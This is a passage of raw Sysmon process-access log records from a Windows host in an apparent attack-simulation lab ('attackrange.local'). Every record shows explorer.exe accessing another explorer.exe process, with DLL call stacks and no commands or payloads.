22:54:54.165{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.165{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.165{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.165{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.165{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.165{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.164{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.163{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.163{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.163{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.163{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.163{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.163{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.163{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.163{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.162{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.162{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.162{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.162{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.162{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 